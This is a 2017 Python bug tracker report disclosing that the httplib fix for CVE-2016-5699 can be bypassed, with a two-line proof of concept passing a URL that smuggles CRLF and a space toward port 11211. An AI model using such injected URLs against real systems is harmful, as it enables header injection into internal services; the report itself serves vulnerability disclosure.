[New-bugs-announce] [issue30458] CRLF Injection in httplib

Orange report at bugs.python.org
Wed May 24 11:01:31 EDT 2017

New submission from Orange:

Hi, the patch in CVE-2016-5699 can be broke by an addition space.

import urllib, urllib2

urllib.urlopen('\r\n\x20hihi\r\n :11211')
urllib2.urlopen('\r\n\x20hihi\r\n :11211')

components: Library (Lib)
messages: 294360
nosy: orange
priority: normal
severity: normal
status: open
title: CRLF Injection in httplib
versions: Python 2.7

Python tracker <report at bugs.python.org>

More information about the New-bugs-announce mailing list